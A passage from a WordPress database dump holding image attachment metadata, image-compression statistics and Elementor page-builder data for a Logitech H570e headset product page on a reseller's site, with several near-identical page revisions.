image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:25:\"h570e-headset-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6007,3027,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.2789569436021839266004462842829525470733642578125;s:5:\"bytes\";i:6826;s:11:\"size_before\";i:82450;s:10:\"size_after\";i:75624;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.12000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:210;s:11:\"size_before\";i:4103;s:10:\"size_after\";i:3893;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.62999999999999989341858963598497211933135986328125;s:5:\"bytes\";i:389;s:11:\"size_before\";i:6911;s:10:\"size_after\";i:6522;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2629;s:11:\"size_before\";i:26774;s:10:\"size_after\";i:24145;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.3499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:429;s:11:\"size_before\";i:6755;s:10:\"size_after\";i:6326;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:8;s:5:\"bytes\";i:1182;s:11:\"size_before\";i:14777;s:10:\"size_after\";i:13595;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1987;s:11:\"size_before\";i:23130;s:10:\"size_after\";i:21143;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(6008,3028,'_wp_page_template','template-fullwidth.php'),(6009,3028,'_elementor_edit_mode','builder'),(6010,3028,'_elementor_template_type','post'),(6011,3028,'_elementor_data','[{\"id\":\"9a6f05e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"28e274f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b6a8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LOGITECH H570E HEADSET<\\/p><p>Comfortable, affordable, and built to last<\\/p><ul><li>Strong and light for long-term comfort<\\/li><li>Easy-to-find inline controls<\\/li><li>Clear audio at a great price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"456d3b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0c1df44\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.png\",\"id\":3025}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"945afd4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ee36db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"984c380\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>AFFORDABLE CLARITY AND COMFORT<\\/h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. It\\u2019s easy to use as well: just connect it to a PC or Mac\\u00ae through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5017396\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7aebfce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"36243c3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"943fc3e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf32abd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f33b72a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa6f4f6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset.jpg\",\"id\":3026}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d6403b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02151a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VALUE FOR GREAT FEATURES<\\/h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"10681e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"abebb17\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e0175a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMFORTABLE AND LONG-LASTING<\\/h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"feea9a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f3940fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.jpg\",\"id\":3027}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3c9f8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"610f486\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"bb08b6d\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b7f2ead\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c00455\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8eb7470\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8881c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>REINFORCED PADDED HEADBAND<\\/h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and \\u201cjust the right\\u201d fit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2cec6a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4746e96\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NOISE &amp; ECHO CANCELLATION<\\/h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is optimized so you can hear and be heard, even in noisy workspaces.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"396fb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4c41396\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NO-LOOK INLINE CONTROLS<\\/h4><p>Control the call with answer\\/end, volume up\\/down and mute buttons. A flat and flexible cable resists tangles.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfd459\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"890a6f0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIMIZED FOR VOICE AND MUSIC<\\/h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6012,3028,'_elementor_version','0.4'),(6015,3029,'_wp_page_template','template-fullwidth.php'),(6016,3029,'_elementor_edit_mode','builder'),(6017,3029,'_elementor_template_type','post'),(6018,3029,'_elementor_data','[{\"id\":\"9a6f05e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"28e274f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b6a8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>LOGITECH H570E HEADSET<\\/p><p>Comfortable, affordable, and built to last<\\/p><ul><li>Strong and light for long-term comfort<\\/li><li>Easy-to-find inline controls<\\/li><li>Clear audio at a great price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"456d3b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0c1df44\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.png\",\"id\":3025}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"945afd4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ee36db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"984c380\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>AFFORDABLE CLARITY AND COMFORT<\\/h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. It\\u2019s easy to use as well: just connect it to a PC or Mac\\u00ae through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5017396\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7aebfce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"36243c3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"943fc3e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf32abd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f33b72a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa6f4f6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset.jpg\",\"id\":3026}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d6403b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02151a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VALUE FOR GREAT FEATURES<\\/h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"10681e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"abebb17\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e0175a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMFORTABLE AND LONG-LASTING<\\/h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"feea9a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f3940fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.jpg\",\"id\":3027}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3c9f8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"610f486\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"bb08b6d\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b7f2ead\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c00455\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8eb7470\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8881c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>REINFORCED PADDED HEADBAND<\\/h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and \\u201cjust the right\\u201d fit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2cec6a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4746e96\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NOISE &amp; ECHO CANCELLATION<\\/h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is optimized so you can hear and be heard, even in noisy workspaces.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"396fb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4c41396\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NO-LOOK INLINE CONTROLS<\\/h4><p>Control the call with answer\\/end, volume up\\/down and mute buttons. A flat and flexible cable resists tangles.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfd459\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"890a6f0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIMIZED FOR VOICE AND MUSIC<\\/h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6019,3029,'_elementor_version','0.4'),(6022,3030,'_wp_page_template','template-fullwidth.php'),(6023,3030,'_elementor_edit_mode','builder'),(6024,3030,'_elementor_template_type','post'),(6025,3030,'_elementor_data','[{\"id\":\"9a6f05e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"28e274f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b6a8d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>LOGITECH H570E HEADSET<\\/h2><p>Comfortable, affordable, and built to last<\\/p><ul><li>Strong and light for long-term comfort<\\/li><li>Easy-to-find inline controls<\\/li><li>Clear audio at a great price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"456d3b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0c1df44\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.png\",\"id\":3025}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"945afd4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ee36db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"984c380\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>AFFORDABLE CLARITY AND COMFORT<\\/h2><p>For people who make their living on the phone, a comfortable headset makes every call more productive. Stylish and durable, the Logitech H570e Headset delivers comfort day after day. It\\u2019s easy to use as well: just connect it to a PC or Mac\\u00ae through the USB cable. The H570e includes premium noise-cancelling features for crystal clear sound at an affordable price.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5017396\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7aebfce\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"36243c3\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"943fc3e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf32abd\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f33b72a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa6f4f6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset.jpg\",\"id\":3026}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d6403b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02151a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GREAT VALUE FOR GREAT FEATURES<\\/h3><p>The Logitech H570e Headset offers premium features at an affordable price. Acoustic echo cancellation, a noise-cancelling mic, and digital signal processing (DSP) block out unwanted noise for clear conversations with great sound quality. Choose H570e Mono or H570e Stereo for one or two speakers.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"10681e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"abebb17\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e0175a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMFORTABLE AND LONG-LASTING<\\/h3><p>Business people on the phone for hours will enjoy the comfort of this headset. Stylish, lightweight design and durable materials mean you can wear the H570e all day. Leatherette ear pads, plus padded headband with metal reinforcement provides strength and flexibility, with a fit that feels just right.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"feea9a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f3940fb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/h570e-headset-1.jpg\",\"id\":3027}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3c9f8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"610f486\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"bb08b6d\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b7f2ead\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c00455\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8eb7470\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b8881c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>REINFORCED PADDED HEADBAND<\\/h4><p>Durable and adjustable padded headband can be worn comfortably all day while metal reinforcement provides strength, flexibility, and \\u201cjust the right\\u201d fit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2cec6a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4746e96\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NOISE &amp; ECHO CANCELLATION<\\/h4><p>With acoustic echo cancellation and a noise-cancelling microphone, H570e is optimized so you can hear and be heard, even in noisy workspaces.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"396fb53\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4c41396\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NO-LOOK INLINE CONTROLS<\\/h4><p>Control the call with answer\\/end, volume up\\/down and mute buttons. A flat and flexible cable resists tangles.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfd459\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"890a6f0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>OPTIMIZED FOR VOICE AND MUSIC<\\/h4><p>A dynamic equalizer automatically switches between voice and music modes, delivering the best sound quality for what the user is listening to.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6026,3030,'_elementor_version','0.4'),(6030,3031,'_wp_page_template','template-fullwidth.php'),(6031,3031,'_hide_page_title',''),(6032,3031,'_hide_header',''),(6033,3031,'_hide_footer',''),(6034,3031,'_hide_breadcrumb',''),(6035,3031,'_cover',''),(6036,3031,'_show_excerpt',''),(6037,3031,'_wc_apply_product',''),(6038,3031,'_yoast_wpseo_content_score','30'),(6039,3031,'_elementor_edit_mode','builder'),(6040,3031,'_elementor_template_type','post'),(6041,3033,'_wp_attached_file','2019/03/smartdock-1.png'),(6042,3033,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:687;s:6:\"height\";i:600;s:4:\"file\";s:23:\"2019/03/smartdock-1.png\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"smartdock-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"smartdock-1-300x262.png\";s:5:\"width\";i:300;s:6:\"height\";i:262;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"smartdock-1-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"smartdock-1-480x300.png\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"smartdock-1-640x400.png\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"smartdock-1-20x17.png\";s:5:\"width\";i:20;s:6:\"height\";i:17;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6043,3033,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:17.20604315680707685487504932098090648651123046875;s:5:\"bytes\";i:68606;s:11:\"size_before\";i:398732;s:10:\"size_after\";i:330126;s:4:\"time\";d:1.1699999999999999289457264239899814128875732421875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:11067;s:10:\"size_after\";i:11067;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:7764;s:11:\"size_before\";i:48998;s:10:\"size_after\";i:41234;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.690000000000001278976924368180334568023681640625;s:5:\"bytes\";i:8003;s:11:\"size_before\";i:38681;s:10:\"size_after\";i:30678;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:20394;s:11:\"size_before\";i:110568;s:10:\"size_after\";i:90174;s:4:\"time\";d:0.289999999999999980015985556747182272374629974365234375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:17.129999999999999005240169935859739780426025390625;s:5:\"bytes\";i:32445;s:11:\"size_before\";i:189418;s:10:\"size_after\";i:156973;s:4:\"time\";d:0.57999999999999996003197111349436454474925994873046875;}}}'),(6044,3034,'_wp_attached_file','2019/03/smartdock.jpg'),(6045,3034,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:21:\"2019/03/smartdock.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"smartdock-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"smartdock-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"smartdock-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"smartdock-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"smartdock-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s: